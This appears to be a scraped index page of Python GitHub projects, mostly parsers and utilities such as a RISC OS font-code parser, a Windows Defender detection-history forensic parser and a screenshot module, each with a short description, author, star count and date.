Parser for RISC OS Font control characters in Python

RISC OS Font control parsing in Python This repository contains a class (FontControlParser) for parsing font control codes from a byte squence, in Pyt

Charles Ferguson 1 Nov 2, 2021
A python library for writing parser-based interactive fiction.

About IntFicPy A python library for writing parser-based interactive fiction. Currently in early development. IntFicPy Docs Parser-based interactive f

Rita Lester 28 Jun 22, 2022
Neogex is a human readable parser standard, being implemented in Python

Neogex (New Expressions) Parsing Standard Much like Regex, Neogex allows for string parsing and validation based on a set of requirements. Unlike Rege

Seamus Donnellan 1 Dec 17, 2021
A repository containing useful resources needed to complete the SUSE Scholarship Challenge #UdacitySUSEScholars #poweredbySUSE

SUSE-udacity-cloud-native-scholarship A repository containing useful resources needed to complete the SUSE Scholarship Challenge #UdacitySUSEScholars

Nandini Proothi 11 Dec 2, 2021
Install Firefox from Mozilla.org easily, complete with .desktop file creation.

firefox-installer Install Firefox from Mozilla.org easily, complete with .desktop file creation. Dependencies Python 3 Python LXML Debian/Ubuntu: sudo

rany 7 Nov 26, 2021
Running a complete single-node all-in-one cluster instance of TIBCO ActiveMatrix™ BusinessWorks 6.8.0.

TIBCO ActiveMatrix™ BusinessWorks 6.8 Docker Image Image for running a complete single-node all-in-one cluster instance of TIBCO ActiveMatrix™ Busines

Federico Alpi 1 Dec 10, 2021
The semi-complete teardown of Cosmo's Cosmic Adventure.

The semi-complete teardown of Cosmo's Cosmic Adventure.

Scott Smitelli 3 Jun 16, 2022
Taxonomy addition for complete trees

TACT: Taxonomic Addition for Complete Trees TACT is a Python app for stochastic polytomy resolution. It uses birth-death-sampling estimators across an

Jonathan Chang 3 Jun 7, 2022
Ergonomic option parser on top of dataclasses, inspired by structopt.

oppapī Ergonomic option parser on top of dataclasses, inspired by structopt. Usage from typing import Optional from oppapi import from_args, oppapi @

yukinarit 2 Mar 8, 2022
A simple string parser based on CLR to check whether a string is acceptable or not for a given grammar.

A simple string parser based on CLR to check whether a string is acceptable or not for a given grammar.

Bharath M Kulkarni 1 Dec 15, 2021
Parser for air tickets' price

Air-ticket-price-parser Parser for air tickets' price How to Install Firefox If geckodriver.exe is not compatible with your Firefox version, download

Situ Xuannn 1 Dec 13, 2021
A parser of Windows Defender's DetectionHistory forensic artifact, containing substantial info about quarantined files and executables.

A parser of Windows Defender's DetectionHistory forensic artifact, containing substantial info about quarantined files and executables.

Jordan Klepser 93 Jun 10, 2022
The parser of a timetable of tennis matches for Flashscore website

FlashscoreParser The parser of a timetable of tennis matches for Flashscore website. The program collects the schedule of tennis matches for two days

Valendovsky 0 Jun 24, 2022
An ultra fast cross-platform multiple screenshots module in pure Python using ctypes.

Python MSS from mss import mss # The simplest use, save a screen shot of the 1st monitor with mss() as sct: sct.shot() An ultra fast cross-platfo

Mickaël Schoentgen 736 Jul 7, 2022
Ikaros is a free financial library built in pure python that can be used to get information for single stocks, generate signals and build prortfolios

Ikaros is a free financial library built in pure python that can be used to get information for single stocks, generate signals and build prortfolios

Salma Saidane 63 Jun 7, 2022